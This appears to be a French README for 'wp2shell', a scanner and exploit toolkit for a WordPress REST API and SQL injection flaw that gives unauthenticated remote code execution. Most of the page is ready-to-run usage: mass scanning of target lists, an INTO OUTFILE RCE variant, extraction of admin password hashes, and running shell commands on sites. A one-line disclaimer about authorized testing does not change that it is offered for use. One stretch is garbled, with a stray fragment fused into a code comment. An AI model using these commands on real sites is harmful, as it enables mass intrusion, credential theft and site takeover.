
wp2shell - Exploit & Scanner WordPress CVE-2026-63030
⚡ Scanner de vulnérabilités et exploit rapide et en temps réel pour CVE-2026-63030 (wp2shell)
wp2shell est une boîte à outils complète pour détecter et exploiter CVE-2026-63030, une vulnérabilité critique dans WordPress qui permet à des attaquants non authentifiés d'exécuter du code à distance via une confusion de routes par lots de l'API REST combinée à une injection SQL.
CVE-2026-63030 (wp2shell) est une vulnérabilité critique découverte par Adam Kues (Assetnote / Searchlight Cyber) qui affecte le noyau de WordPress. Elle combine deux bugs :
author__not_in# Clone repository
git clone https://github.com/Lutfifakee-Project/wp2shell.git
cd wp2shell
# No dependencies required - uses Python standard library only!
# Python 3.7+ required
Scanner multi-threadé en temps réel pour la détection de vulnérabilités à grande échelle.
# Basic scan
python wp2shell_scanner.py -f list.txt -o results.txt
# Skip SQLi test (faster)
python wp2shell_scanner.py -f list.txt -o results.txt --no-sqli-test
# JSON output
python wp2shell_scanner.py -f list.txt -j
Démontre la variante RCE INTO OUTFILE (nécessite le privilège FILE de MySQL).
# Single target
python3 wp2shell_intooutfile.py https://target.com
# Multiple targets
python3 wp2shell_intooutfile.py -f list.txt -t 10
Version portable et mono-fichier de l'exploit avec toutes les fonctionnalités.
# Check vulnerability
python wp2shell-exploit.py check https://target.com
# Read users (extract password hashes)
python wp2shell-exploit.py read https://target.com --preset users
# Read fingerprint
python wp2shell-exploit.py read https://target.com --preset fingerprint
# Execute command (after cracking hash)
python wp2shell-exploit.py shell https://target.com --user admin --password "cracked" --cmd "id"
IMPORTANT : Cet outil est destiné uniquement à des fins éducatives et de tests autorisés.
| Plage de versions | Impact | État |
|---|
| 6.9.0 - 6.9.4 | 🔴 RCE (Critique) | ❌ Vulnérable |
| 7.0.0 - 7.0.1 | 🔴 RCE (Critique) | ❌ Vulnérable |
| 6.8.0 - 6.8.5 | 🟡 SQLi (Élevé) | ❌ Vulnérable |
| 6.9.5+ / 7.0.2+ | ✅ Corrigé | ✅ Sûr |